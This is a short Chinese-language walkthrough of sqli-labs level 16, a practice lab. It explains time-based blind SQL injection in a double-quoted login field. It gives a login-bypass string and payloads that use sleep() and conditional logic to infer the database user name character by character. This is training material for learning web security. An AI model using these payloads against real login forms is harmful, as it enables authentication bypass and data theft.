sqli-labs第十六题

查看题目

基于时间的盲注双引号类型

寻找SQL盲注

尝试常用的测试字符串，发现
") or 1=1# 登录成功

利用盲注

构造payload:") or if(substr(user(),1,4)='root',sleep(5),1)#
推断当前用户名的前四个字符是不是'root'如果是将会产生延迟，反之会成功登录

所以这里也可以基于登录状态来推断，如下payload
") or if(substr(user(),1,4)='root',1,0)#
推断正确将成功登录，反之登录失败。